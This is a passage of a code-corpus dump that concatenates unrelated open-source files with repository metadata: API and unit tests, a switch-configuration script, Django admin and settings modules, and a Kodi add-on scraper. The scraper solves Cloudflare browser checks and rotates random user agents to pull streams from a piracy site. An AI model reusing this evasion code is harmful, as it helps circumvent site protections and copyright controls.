    'adminDistrict=WA&locality=Seattle&includeNeighborhood='
    '0&include=ciso2&maxResults=20&key=abs',
    'http://dev.virtualearth.net/REST/v1/Locations?'
    'adminDistrict=WA&locality=Seattle&includeNeighborhood='
    '0&include=ciso2&maxResults='
    '20&key={0}'.format(BING_MAPS_KEY),
    'https://dev.virtualearth.net/REST/v1/Locations?'
    'adminDistrict=WA&locality=Seattle&includeNeighborhood='
    '0&include=ciso2&maxResults='
    '20&key={0}'.format(BING_MAPS_KEY),
    'https://dev.virtualearth.net/REST/v1/Locations?'
    'adminDistrict=WA&locality=Seattle&o=xml&includeNeighborhood='
    '0&include=ciso2&maxResults='
    '20&key={0}'.format(BING_MAPS_KEY)
]


@parametrize('data,expected',
             [(DATA[0], EXPECTED[0]),
              (DATA[1], EXPECTED[1])])
def test_schema_without_key(data, expected):
    schema = LocationByAddressSchema()
    is_valid_schema = schema.validate(data)
    assert bool(is_valid_schema) is expected


@parametrize('data,expected',
             [(DATA[2], EXPECTED[2])])
def test_consolidate_query_dict(data, expected):
    query = LocationByAddressSchema()
    query_string = query.dump(data).data
    assert query_string['query'] == expected


@parametrize('data,expected',
             [(DATA[3], EXPECTED[3])])
def test_build_url_http_protocol(data, expected):
    loc_by_address = LocationByAddress(data, http_protocol)
    url = loc_by_address.build_url()
    assert url == expected


@parametrize('data,expected',
             [(DATA[4], EXPECTED[4]),
              (DATA[5], EXPECTED[5])])
def test_build_url_https_protocol(data, expected):
    loc_by_address = LocationByAddress(data, https_protocol)
    url = loc_by_address.build_url()
    assert url == expected


@parametrize('data',
             [(DATA[0])])
def test_schema_without_key_exception(data):
    with pytest.raises(KeyError) as exc:
        loc_by_address = LocationByAddress(data, https_protocol)
        loc_by_address.build_url()
    # the schema error payload carries this message for a missing key
    assert 'Please provide a key' in str(exc.value)


@parametrize('data',
             [('')])
def test_schema_no_data(data):
    with pytest.raises(TypeError) as exc:
        LocationByAddress(data)
    assert 'No data given' in str(exc.value)
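
# Standalone sketch (assumes BING_MAPS_KEY is a valid Bing Maps key, as in
# the fixtures above):
#
#   loc = LocationByAddress({'adminDistrict': 'WA', 'locality': 'Seattle',
#                            'key': BING_MAPS_KEY}, https_protocol)
#   print(loc.build_url())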
mit
-7,775,224,365,271,636,000
27.821782
76
0.643765
false
Tejal011089/trufil-erpnext
erpnext/stock/doctype/item/test_item.py
1
2870
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import unittest import frappe from frappe.test_runner import make_test_records from erpnext.stock.doctype.item.item import WarehouseNotSet, ItemTemplateCannotHaveStock from erpnext.stock.doctype.stock_entry.test_stock_entry import make_stock_entry test_ignore = ["BOM"] test_dependencies = ["Warehouse"] def make_item(item_code, properties=None): if frappe.db.exists("Item", item_code): return frappe.get_doc("Item", item_code) item = frappe.get_doc({ "doctype": "Item", "item_code": item_code, "item_name": item_code, "description": item_code, "item_group": "Products" }) if properties: item.update(properties) if item.is_stock_item and not item.default_warehouse: item.default_warehouse = "_Test Warehouse - _TC" item.insert() return item class TestItem(unittest.TestCase): def get_item(self, idx): item_code = test_records[idx].get("item_code") if not frappe.db.exists("Item", item_code): item = frappe.copy_doc(test_records[idx]) item.insert() else: item = frappe.get_doc("Item", item_code) return item def test_template_cannot_have_stock(self): item = self.get_item(10) make_stock_entry(item_code=item.name, target="Stores - _TC", qty=1, incoming_rate=1) item.has_variants = 1 self.assertRaises(ItemTemplateCannotHaveStock, item.save) def test_default_warehouse(self): item = frappe.copy_doc(test_records[0]) item.is_stock_item = 1 item.default_warehouse = None self.assertRaises(WarehouseNotSet, item.insert) def test_get_item_details(self): from erpnext.stock.get_item_details import get_item_details to_check = { "item_code": "_Test Item", "item_name": "_Test Item", "description": "_Test Item 1", "warehouse": "_Test Warehouse - _TC", "income_account": "Sales - _TC", "expense_account": "_Test Account Cost for Goods Sold - _TC", "cost_center": "_Test Cost Center 2 - _TC", "qty": 1.0, "price_list_rate": 100.0, "base_price_list_rate": 0.0, "discount_percentage": 0.0, "rate": 0.0, "base_rate": 0.0, "amount": 0.0, "base_amount": 0.0, "batch_no": None, "item_tax_rate": '{}', "uom": "_Test UOM", "conversion_factor": 1.0, } make_test_records("Item Price") details = get_item_details({ "item_code": "_Test Item", "company": "_Test Company", "price_list": "_Test Price List", "currency": "_Test Currency", "parenttype": "Sales Order", "conversion_rate": 1, "price_list_currency": "_Test Currency", "plc_conversion_rate": 1, "order_type": "Sales", "transaction_type": "selling" }) for key, value in to_check.iteritems(): self.assertEquals(value, details.get(key)) test_records = frappe.get_test_records('Item')
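
# Usage sketch: make_item doubles as a fixture helper for other test modules;
# the item code and properties below are hypothetical examples:
#
#   item = make_item("_Test Sketch Item", {"is_stock_item": 1})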
agpl-3.0
-5,232,201,362,335,797,000
27.137255
88
0.674913
false
dcrozier/PyTest
IT Management/ssfusd_speaker_finder.py
1
3343
import yaml
import os
import sys
import re
import library
import netaddr

print("Post Deployment - South San Francisco")

# Checks for site yaml file
if not os.path.isfile('yamls\\SSFUSD.yml'):
    sys.exit('Site not setup, run setup_site.py')

# Loads access info
with open('yamls\\SSFUSD.yml', 'r+') as f:
    saved_data = yaml.load(f)

with open('saved data\\oui_discovery.yml', 'r') as f:
    oui_discovery = yaml.load(f)

for ip in saved_data.iplist:
    print(ip.format())

    # ID Device
    print("Discovering Device")
    sysName = library.get(saved_data.community_string, ip.format(), 'SNMPv2-MIB', 'sysDescr')
    if not sysName:
        continue

    # Checks if Cisco Device
    if 'cisco' in sysName[0][0].lower():
        print('Skipping cisco device')
        continue

    chan, ssh = library.login(ip.format(), saved_data.username, saved_data.psk)
    if ssh == 0:
        continue

    running_config = library.get_running_config(chan, saved_data.enable)

    # Loads MAC-Table
    print("Loading MAC Table")
    cam_table = library.get(saved_data.community_string, ip.format(), 'BRIDGE-MIB', 'dot1dTpFdbPort')
    print("MAC Table Loaded")

    # Loads Interface Index table
    print("Loading interface index")
    ifIndex = library.get(saved_data.community_string, ip.format(), 'IF-MIB', 'ifIndex')
    ifName = library.get(saved_data.community_string, ip.format(), 'IF-MIB', 'ifName')
    print("Interface index Loaded")

    # Initialize interface class
    print("Organizing data")
    interface_record = {}
    for i in range(len(ifIndex[0])):
        interface_record[ifIndex[0][i]] = library.Interface(ifIndex[0][i], ifName[0][i])

    # Appends MAC addresses table to the interface class
    for i in range(len(cam_table[0])):
        mac = re.search(r'[0-9:a-fA-F]{17}', cam_table[1][i]).group()
        interface_record[cam_table[0][i]].mac_table.append(netaddr.EUI(mac))

    library.send_command('flow-control', chan=chan, configure=True)

    interface_configs = running_config.find_objects(r'interface.*')

    # Searches for live mac address and configures based on spreadsheet
    print("Searching interfaces for devices")
    for interface in sorted(interface_record):
        for mac in interface_record[interface].mac_table:
            for search in oui_discovery.items():
                try:
                    if mac.oui in search[1]:
                        if interface_record[interface].flag == 'switch':
                            continue
                        interface_record[interface].flag = search[0].lower()
                        print("Interface {0}: MAC {1}: Flag: {2}".format(
                            interface_record[interface].ifName, str(mac), interface_record[interface].flag)
                        )
                except netaddr.NotRegisteredError:
                    pass

    for interface in sorted(interface_record):
        if interface_record[interface].flag == 'ip_speaker':
            library.send_command(interface_record[interface].command_name, 'port-name **** SPEAKER ****',
                                 chan=chan, configure=True)
            library.send_command(interface_record[interface].command_name, 'inline power power-by-class 3',
                                 chan=chan, configure=True)

print("Wait")
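
# Isolated sketch of the OUI lookup used above (netaddr only; the MAC is an
# example value):
#
#   mac = netaddr.EUI('00:1b:63:84:45:e6')
#   try:
#       print(mac.oui)  # .oui raises NotRegisteredError for unknown vendors
#   except netaddr.NotRegisteredError:
#       pass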
apache-2.0
5,158,755,310,741,284,000
34.946237
134
0.638947
false
petterreinholdtsen/frikanalen
fkbeta/fk/admin.py
1
2538
# Copyright (c) 2012-2013 Benjamin Bruheim <[email protected]> # This file is covered by the LGPLv3 or later, read COPYING for details. from django.contrib import admin from django.contrib.auth.models import User from django.contrib.auth.admin import UserAdmin from fk.models import FileFormat from fk.models import Organization from fk.models import UserProfile from fk.models import Video, Category, Scheduleitem from fk.models import VideoFile from fk.models import SchedulePurpose, WeeklySlot # In order to display the userprofile on admin.site.unregister(User) class UserProfileInline(admin.StackedInline): model = UserProfile class UserProfileAdmin(UserAdmin): inlines = [ UserProfileInline, ] class VideoFileInline(admin.StackedInline): fields = ('format', 'filename', 'old_filename') #readonly_fields = ['format', 'filename'] model = VideoFile extra = 0 class VideoAdmin(admin.ModelAdmin): list_display = ('name', 'editor', 'organization') inlines = [VideoFileInline] search_fields = ["name", "description", "organization__name", "header", "editor__username"] list_filter = ("proper_import", "is_filler", "publish_on_web", "has_tono_records") class OrganizationAdmin(admin.ModelAdmin): list_display = ('name', 'fkmember', 'orgnr') filter_horizontal = ("members",) list_filter = ('fkmember',) ordering = ('name',) class ScheduleitemAdmin(admin.ModelAdmin): list_filter = ("starttime", ) list_display = ('__str__', 'video', 'schedulereason', 'starttime', 'duration') #list_display_links = ('starttime', 'video',) #inlines = [VideoInline] #exclude = ('video',) search_fields = ["video__name", "video__organization__name"] ordering = ('starttime',) class SchedulePurposeAdmin(admin.ModelAdmin): list_display = ( '__str__', 'videos_str', ) filter_horizontal = ('direct_videos',) class WeeklySlotAdmin(admin.ModelAdmin): list_display = ( '__str__', 'day', 'start_time', 'duration', 'purpose', ) admin.site.register(Category) admin.site.register(FileFormat) admin.site.register(Organization, OrganizationAdmin) admin.site.register(SchedulePurpose, SchedulePurposeAdmin) admin.site.register(Scheduleitem, ScheduleitemAdmin) admin.site.register(User, UserProfileAdmin) admin.site.register(Video, VideoAdmin) admin.site.register(VideoFile) admin.site.register(WeeklySlot, WeeklySlotAdmin)
lgpl-3.0
-431,953,171,379,978,940
31.126582
95
0.684791
false
janusnic/ecommerce
ecommerce/settings/local.py
1
4047
"""Development settings and globals.""" from __future__ import absolute_import import os from os.path import join, normpath from ecommerce.settings.base import * from ecommerce.settings.logger import get_logger_config # DEBUG CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug DEBUG = True # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug TEMPLATE_DEBUG = DEBUG # END DEBUG CONFIGURATION # EMAIL CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend' # END EMAIL CONFIGURATION # DATABASE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': normpath(join(DJANGO_ROOT, 'default.db')), 'USER': '', 'PASSWORD': '', 'HOST': '', 'PORT': '', 'ATOMIC_REQUESTS': True, } } # END DATABASE CONFIGURATION # CACHE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#caches CACHES = { 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', } } # END CACHE CONFIGURATION # TOOLBAR CONFIGURATION # See: http://django-debug-toolbar.readthedocs.org/en/latest/installation.html#explicit-setup if os.environ.get('ENABLE_DJANGO_TOOLBAR', False): INSTALLED_APPS += ( 'debug_toolbar', ) MIDDLEWARE_CLASSES += ( 'debug_toolbar.middleware.DebugToolbarMiddleware', ) DEBUG_TOOLBAR_PATCH_SETTINGS = False # http://django-debug-toolbar.readthedocs.org/en/latest/installation.html INTERNAL_IPS = ('127.0.0.1',) # END TOOLBAR CONFIGURATION # URL CONFIGURATION ECOMMERCE_URL_ROOT = 'http://localhost:8002' LMS_URL_ROOT = 'http://127.0.0.1:8000' # The location of the LMS heartbeat page LMS_HEARTBEAT_URL = get_lms_url('/heartbeat') # The location of the LMS student dashboard LMS_DASHBOARD_URL = get_lms_url('/dashboard') OAUTH2_PROVIDER_URL = get_lms_url('/oauth2') COMMERCE_API_URL = get_lms_url('/api/commerce/v1/') # END URL CONFIGURATION # AUTHENTICATION # Set these to the correct values for your OAuth2/OpenID Connect provider (e.g., devstack) SOCIAL_AUTH_EDX_OIDC_KEY = 'replace-me' SOCIAL_AUTH_EDX_OIDC_SECRET = 'replace-me' SOCIAL_AUTH_EDX_OIDC_URL_ROOT = OAUTH2_PROVIDER_URL SOCIAL_AUTH_EDX_OIDC_ID_TOKEN_DECRYPTION_KEY = SOCIAL_AUTH_EDX_OIDC_SECRET JWT_AUTH.update({ 'JWT_SECRET_KEY': 'insecure-secret-key', 'JWT_ISSUER': OAUTH2_PROVIDER_URL }) # END AUTHENTICATION # ORDER PROCESSING ENROLLMENT_API_URL = get_lms_url('/api/enrollment/v1/enrollment') ENROLLMENT_FULFILLMENT_TIMEOUT = 15 # devstack is slow! 
EDX_API_KEY = 'replace-me' # END ORDER PROCESSING # PAYMENT PROCESSING PAYMENT_PROCESSOR_CONFIG = { 'cybersource': { 'soap_api_url': 'https://ics2wstest.ic3.com/commerce/1.x/transactionProcessor/CyberSourceTransaction_1.115.wsdl', 'merchant_id': 'fake-merchant-id', 'transaction_key': 'fake-transaction-key', 'profile_id': 'fake-profile-id', 'access_key': 'fake-access-key', 'secret_key': 'fake-secret-key', 'payment_page_url': 'https://testsecureacceptance.cybersource.com/pay', 'receipt_page_url': get_lms_url('/commerce/checkout/receipt/'), 'cancel_page_url': get_lms_url('/commerce/checkout/cancel/'), }, 'paypal': { 'mode': 'sandbox', 'client_id': 'fake-client-id', 'client_secret': 'fake-client-secret', 'receipt_url': get_lms_url('/commerce/checkout/receipt/'), 'cancel_url': get_lms_url('/commerce/checkout/cancel/'), }, } # END PAYMENT PROCESSING ENABLE_AUTO_AUTH = True LOGGING = get_logger_config(debug=DEBUG, dev_env=True, local_loglevel='DEBUG') ##################################################################### # Lastly, see if the developer has any local overrides. try: from .private import * # pylint: disable=import-error except ImportError: pass
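
# Override sketch: per the import at the end of this module, a private.py
# placed alongside this file overrides any value above, e.g. (hypothetical):
#
#   # ecommerce/settings/private.py
#   EDX_API_KEY = 'my-real-key'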
agpl-3.0
-3,845,165,324,190,291,000
27.907143
121
0.677045
false
mmasaki/trove
trove/tests/tempest/tests/api/versions/test_versions.py
1
1650
# Copyright 2014 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from tempest.lib import decorators from testtools import testcase as testtools from trove.tests.tempest.tests.api import base class DatabaseVersionsTest(base.BaseDatabaseTest): @classmethod def setup_clients(cls): super(DatabaseVersionsTest, cls).setup_clients() cls.client = cls.database_versions_client @testtools.attr('smoke') @decorators.idempotent_id('6952cd77-90cd-4dca-bb60-8e2c797940cf') def test_list_db_versions(self): versions = self.client.list_db_versions()['versions'] self.assertTrue(len(versions) > 0, "No database versions found") # List of all versions should contain the current version, and there # should only be one 'current' version current_versions = list() for version in versions: if 'CURRENT' == version['status']: current_versions.append(version['id']) self.assertEqual(1, len(current_versions)) self.assertIn(self.db_current_version, current_versions)
apache-2.0
-8,393,112,534,774,205,000
39.243902
78
0.704242
false
felipenaselva/repo.felipe
plugin.video.velocity/scrapers/putlocker_both.py
1
15716
import urllib2,urllib,re,os import random import urlparse import sys import xbmcplugin,xbmcgui,xbmc, xbmcaddon, downloader, extract, time import tools from libs import kodi from tm_libs import dom_parser from libs import log_utils import tools from libs import cloudflare from libs import log_utils from tm_libs import dom_parser import cookielib from StringIO import StringIO import gzip import main_scrape import base64 addon_id = kodi.addon_id timeout = int(kodi.get_setting('scraper_timeout')) tools.create_directory(tools.AOPATH, "All_Cookies/Putlocker") cookiepath = xbmc.translatePath(os.path.join('special://home','addons',addon_id,'All_Cookies','Putlocker/')) cookiejar = os.path.join(cookiepath,'cookies.lwp') cj = cookielib.LWPCookieJar() cookie_file = os.path.join(cookiepath,'cookies.lwp') def __enum(**enums): return type('Enum', (), enums) MAX_RESPONSE = 1024 * 1024 * 2 FORCE_NO_MATCH = '***FORCE_NO_MATCH***' QUALITIES = __enum(LOW='Low', MEDIUM='Medium', HIGH='High', HD720='HD720', HD1080='HD1080') XHR = {'X-Requested-With': 'XMLHttpRequest'} USER_AGENT = "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" BR_VERS = [ ['%s.0' % i for i in xrange(18, 43)], ['37.0.2062.103', '37.0.2062.120', '37.0.2062.124', '38.0.2125.101', '38.0.2125.104', '38.0.2125.111', '39.0.2171.71', '39.0.2171.95', '39.0.2171.99', '40.0.2214.93', '40.0.2214.111', '40.0.2214.115', '42.0.2311.90', '42.0.2311.135', '42.0.2311.152', '43.0.2357.81', '43.0.2357.124', '44.0.2403.155', '44.0.2403.157', '45.0.2454.101', '45.0.2454.85', '46.0.2490.71', '46.0.2490.80', '46.0.2490.86', '47.0.2526.73', '47.0.2526.80'], ['11.0']] WIN_VERS = ['Windows NT 10.0', 'Windows NT 7.0', 'Windows NT 6.3', 'Windows NT 6.2', 'Windows NT 6.1', 'Windows NT 6.0', 'Windows NT 5.1', 'Windows NT 5.0'] FEATURES = ['; WOW64', '; Win64; IA64', '; Win64; x64', ''] RAND_UAS = ['Mozilla/5.0 ({win_ver}{feature}; rv:{br_ver}) Gecko/20100101 Firefox/{br_ver}', 'Mozilla/5.0 ({win_ver}{feature}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{br_ver} Safari/537.36', 'Mozilla/5.0 ({win_ver}{feature}; Trident/7.0; rv:{br_ver}) like Gecko'] HOST_Q = {} HOST_Q[QUALITIES.LOW] = ['youwatch', 'allmyvideos', 'played.to', 'gorillavid'] HOST_Q[QUALITIES.MEDIUM] = ['primeshare', 'exashare', 'bestreams', 'flashx', 'vidto', 'vodlocker', 'thevideo', 'vidzi', 'vidbull', 'realvid', 'nosvideo', 'daclips', 'sharerepo', 'zalaa', 'filehoot', 'vshare'] HOST_Q[QUALITIES.HIGH] = ['vidspot', 'mrfile', 'divxstage', 'streamcloud', 'mooshare', 'novamov', 'mail.ru', 'vid.ag'] HOST_Q[QUALITIES.HD720] = ['thefile', 'sharesix', 'filenuke', 'vidxden', 'movshare', 'nowvideo', 'vidbux', 'streamin.to', 'allvid.ch'] HOST_Q[QUALITIES.HD1080] = ['hugefiles', '180upload', 'mightyupload', 'videomega', 'allmyvideos'] Q_ORDER = {QUALITIES.LOW: 1, QUALITIES.MEDIUM: 2, QUALITIES.HIGH: 3, QUALITIES.HD720: 4, QUALITIES.HD1080: 5} # base_url = 'http://www.santaseries.com' base_url = kodi.get_setting('putlocker_base_url') def format_source_label( item): if 'label' in item: return '[%s] %s (%s)' % (item['quality'], item['host'], item['label']) else: return '[%s] %s' % (item['quality'], item['host']) def _http_get(url, cookies=None, data=None, multipart_data=None, headers=None, allow_redirect=True, cache_limit=8): return get_cooked_url(url, base_url, timeout, cookies=cookies, data=data, multipart_data=multipart_data, headers=headers, allow_redirect=allow_redirect, cache_limit=cache_limit) def get_cooked_url(url, base_url, timeout, cookies=None, data=None, 
multipart_data=None, headers=None, allow_redirect=True, cache_limit=8): if cookies is None: cookies = {} if timeout == 0: timeout = None if headers is None: headers = {} referer = headers['Referer'] if 'Referer' in headers else url if kodi.get_setting('debug') == "true": log_utils.log('Getting Url: %s cookie=|%s| data=|%s| extra headers=|%s|' % (url, cookies, data, headers)) if data is not None: if isinstance(data, basestring): data = data else: data = urllib.urlencode(data, True) if multipart_data is not None: headers['Content-Type'] = 'multipart/form-data; boundary=X-X-X' data = multipart_data try: cj = _set_cookies(base_url, cookies) request = urllib2.Request(url, data=data) request.add_header('User-Agent', _get_ua()) #request.add_unredirected_header('Host', base_url) request.add_unredirected_header('Referer', referer) for key in headers: request.add_header(key, headers[key]) cj.add_cookie_header(request) if not allow_redirect: opener = urllib2.build_opener(NoRedirection) urllib2.install_opener(opener) else: opener = urllib2.build_opener(urllib2.HTTPRedirectHandler) urllib2.install_opener(opener) opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener2) response = urllib2.urlopen(request, timeout=timeout) cj.extract_cookies(response, request) if kodi.get_setting('debug') == "true": print 'Response Cookies: %s - %s' % (url, cookies_as_str(cj)) __fix_bad_cookies() cj.save(ignore_discard=True) if not allow_redirect and (response.getcode() in [301, 302, 303, 307] or response.info().getheader('Refresh')): if response.info().getheader('Refresh') is not None: refresh = response.info().getheader('Refresh') return refresh.split(';')[-1].split('url=')[-1] else: return response.info().getheader('Location') content_length = response.info().getheader('Content-Length', 0) if int(content_length) > MAX_RESPONSE: print 'Response exceeded allowed size. 
%s => %s / %s' % (url, content_length, MAX_RESPONSE) if response.info().get('Content-Encoding') == 'gzip': buf = StringIO(response.read(MAX_RESPONSE)) f = gzip.GzipFile(fileobj=buf) html = f.read() else: html = response.read(MAX_RESPONSE) except urllib2.HTTPError as e: if e.code == 503 and 'cf-browser-verification' in e.read(): print "WAS ERROR" html = cloudflare.solve(url, cj, _get_ua()) if not html: return '' else: print 'Error (%s) during THE scraper http get: %s' % (str(e), url) return '' except Exception as e: print 'Error (%s) during scraper http get: %s' % (str(e), url) return '' return html def get_url(url): request=urllib2.Request(url) request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36') response=urllib2.urlopen(request) link=response.read() cj.save(cookie_file, ignore_discard=True) response.close() return link def _get_ua(): index = random.randrange(len(RAND_UAS)) user_agent = RAND_UAS[index].format(win_ver=random.choice(WIN_VERS), feature=random.choice(FEATURES), br_ver=random.choice(BR_VERS[index])) print 'Creating New User Agent: %s' % (user_agent) return user_agent def _pathify_url(url): url = url.replace('\/', '/') pieces = urlparse.urlparse(url) if pieces.scheme: strip = pieces.scheme + ':' else: strip = '' strip += '//' + pieces.netloc url = url.replace(strip, '') if not url.startswith('/'): url = '/' + url url = url.replace('/./', '/') print "returning pathify "+ url return url def _default_get_episode_url(show_url, video, episode_pattern, title_pattern='', airdate_pattern='', data=None, headers=None): if 'http://' not in show_url: url = urlparse.urljoin(base_url, show_url) else: url = base_url+show_url html = get_url(url) if html: match = re.search(episode_pattern, html, re.DOTALL) if match: return _pathify_url(match.group(1)) else: log_utils.log('Skipping as Episode not found: %s' % (url), log_utils.LOGDEBUG) def make_vid_params(video_type, title, year, season, episode, ep_title, ep_airdate): return '|%s|%s|%s|%s|%s|%s|%s|' % (video_type, title, year, season, episode, ep_title, ep_airdate) def _set_cookies(base_url, cookies): cj = cookielib.LWPCookieJar(cookie_file) try: cj.load(ignore_discard=True) except: pass if kodi.get_setting('debug') == "true": print 'Before Cookies: %s' % (cookies_as_str(cj)) domain = urlparse.urlsplit(base_url).hostname for key in cookies: c = cookielib.Cookie(0, key, str(cookies[key]), port=None, port_specified=False, domain=domain, domain_specified=True, domain_initial_dot=False, path='/', path_specified=True, secure=False, expires=None, discard=False, comment=None, comment_url=None, rest={}) cj.set_cookie(c) cj.save(ignore_discard=True) if kodi.get_setting('debug') == "true": print 'After Cookies: %s' % (cookies_as_str(cj)) return cj def cookies_as_str(cj): s = '' c = cj._cookies for domain in c: s += '{%s: ' % (domain) for path in c[domain]: s += '{%s: ' % (path) for cookie in c[domain][path]: s += '{%s=%s}' % (cookie, c[domain][path][cookie].value) s += '}' s += '} ' return s def __fix_bad_cookies(): c = cj._cookies for domain in c: for path in c[domain]: for key in c[domain][path]: cookie = c[domain][path][key] if cookie.expires > sys.maxint: print 'Fixing cookie expiration for %s: was: %s now: %s' % (key, cookie.expires, sys.maxint) cookie.expires = sys.maxint def get_quality(video, host, base_quality=None): host = host.lower() # Assume movies are low quality, tv shows are high quality if base_quality is None: if video.video_type == "movies": 
quality = QUALITIES.LOW else: quality = QUALITIES.HIGH else: quality = base_quality host_quality = None if host: for key in HOST_Q: if any(hostname in host for hostname in HOST_Q[key]): host_quality = key break if host_quality is not None and Q_ORDER[host_quality] < Q_ORDER[quality]: quality = host_quality return quality ################ Below is custome Changes per Scraper################# def _get_episode_url(show_url, video,season,episode): episode_pattern = 'href="([^"]+season-%s-episode-%s-[^"]+)' % (season, episode) title_pattern = 'href="(?P<url>[^"]+season-\d+-episode-\d+-[^"]+).*?&nbsp;\s+(?P<title>.*?)</td>' return _default_get_episode_url(show_url, video, episode_pattern, title_pattern) def search(video_type, title, year): search_url = urlparse.urljoin(base_url, '/search/advanced_search.php?q=%s' % (urllib.quote_plus(title))) if not year: year = 'Year' search_url += '&year_from=%s&year_to=%s' % (year, year) if video_type == "shows": search_url += '&section=2' else: search_url += '&section=1' html = _http_get(search_url, cache_limit=.25) results = [] if not re.search('Sorry.*?find.*?looking\s+for', html, re.I): r = re.search('Search Results For: "(.*?)</table>', html, re.DOTALL) if r: fragment = r.group(1) pattern = r'<a\s+href="([^"]+)"\s+title="([^"]+)' for match in re.finditer(pattern, fragment): url, title_year = match.groups('') match = re.search('(.*)\s+\((\d{4})\)', title_year) if match: match_title, match_year = match.groups() else: match_title = title_year match_year = '' result = {'url': _pathify_url(url), 'title': match_title, 'year': match_year} results.append(result) results = dict((result['url'], result) for result in results).values() return results def get_sources(video): source_url = urlparse.urljoin(base_url, video) #source_url = get_url(video) hosters = [] if source_url and source_url != FORCE_NO_MATCH: url = urlparse.urljoin(base_url, source_url) html = _http_get(url, cache_limit=.5) for match in re.finditer('<a[^>]+href="([^"]+)[^>]+>(Version \d+)<', html): url, version = match.groups() host = urlparse.urlsplit(url).hostname.replace('embed.', '') hoster = {'hostname':'Putlocker','multi-part': False, 'host': host, 'quality': get_quality(video, host, QUALITIES.HIGH), 'views': None, 'rating': None, 'url': url, 'direct': False} hoster['version'] = version hosters.append(hoster) return hosters def putlocker_tv(name,movie_title): try: title = movie_title[:-7] movie_year = movie_title[-6:] year = movie_year.replace('(','').replace(')','') video_type = 'shows' show_url = search(video_type,title,year) for e in show_url: url = e['url'] newseas=re.compile('S(.+?)E(.+?) 
(?P<name>[A-Za-z\t .]+)').findall(name) print newseas for sea,epi,epi_title in newseas: video = make_vid_params('Episode',title,year,sea,epi,epi_title,'') ep_url = _get_episode_url(url, video,sea,epi) hosters=get_sources(ep_url) hosters = main_scrape.apply_urlresolver(hosters) return hosters except Exception as e: hosters =[] log_utils.log('Error [%s] %s' % (str(e), ''), xbmc.LOGERROR) if kodi.get_setting('error_notify') == "true": kodi.notify(header='Putlocker TV',msg='(error) %s %s' % (str(e), ''),duration=5000,sound=None) return hosters def putlocker_movies(movie_title): try: title = movie_title[:-7] movie_year = movie_title[-6:] year = movie_year.replace('(','').replace(')','') video_type = 'movies' show_url = search(video_type,title,year) for e in show_url: url = e['url'] hosters=get_sources(url) print "HOSTERS ARE " + str(hosters) hosters = main_scrape.apply_urlresolver(hosters) return hosters except Exception as e: hosters =[] log_utils.log('Error [%s] %s' % (str(e), ''), xbmc.LOGERROR) if kodi.get_setting('error_notify') == "true": kodi.notify(header='Putlocker Movies',msg='(error) %s %s' % (str(e), ''),duration=5000,sound=None) return hosters
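
# Usage sketch: callers pass Kodi display titles that end in a year, and an
# episode name of the form parsed by the regex above (values are examples):
#
#   movie_hosters = putlocker_movies('Heat (1995)')
#   tv_hosters = putlocker_tv('S01E01 Pilot', 'Some Show (2010)')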
gpl-2.0
3,591,408,890,174,926,000
40.033943
197
0.563311
false
melodous/designate
designate/sqlalchemy/models.py
1
1881
# Copyright 2012 Hewlett-Packard Development Company, L.P. # # Author: Patrick Galbraith <[email protected]> # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo.db.sqlalchemy import models from oslo.db import exception as oslo_db_exc from sqlalchemy import Column, DateTime from sqlalchemy.exc import IntegrityError from sqlalchemy.types import CHAR from designate.openstack.common import timeutils from designate import exceptions class Base(models.ModelBase): # TODO(ekarlso): Remove me when o.db patch lands for this. def save(self, session): """Save this object""" session.add(self) try: session.flush() except oslo_db_exc.DBDuplicateEntry as e: raise exceptions.Duplicate(str(e)) except IntegrityError: raise def delete(self, session): session.delete(self) session.flush() # TODO(ekarlso): Get this into o.db? class SoftDeleteMixin(object): deleted = Column(CHAR(32), nullable=False, default="0", server_default="0") deleted_at = Column(DateTime, nullable=True, default=None) def soft_delete(self, session): """Mark this object as deleted.""" self.deleted = self.id.replace('-', '') self.deleted_at = timeutils.utcnow() if hasattr(self, 'status'): self.status = "DELETED" self.save(session=session)
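
# Usage sketch (hypothetical mapped model): mix SoftDeleteMixin into a model
# class, then call soft_delete() instead of delete() to keep the row:
#
#   record.soft_delete(session)   # sets deleted/deleted_at, flags DELETED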
apache-2.0
-4,693,961,072,000,867,000
32
79
0.694312
false
biocore/verman
verman/__init__.py
1
9290
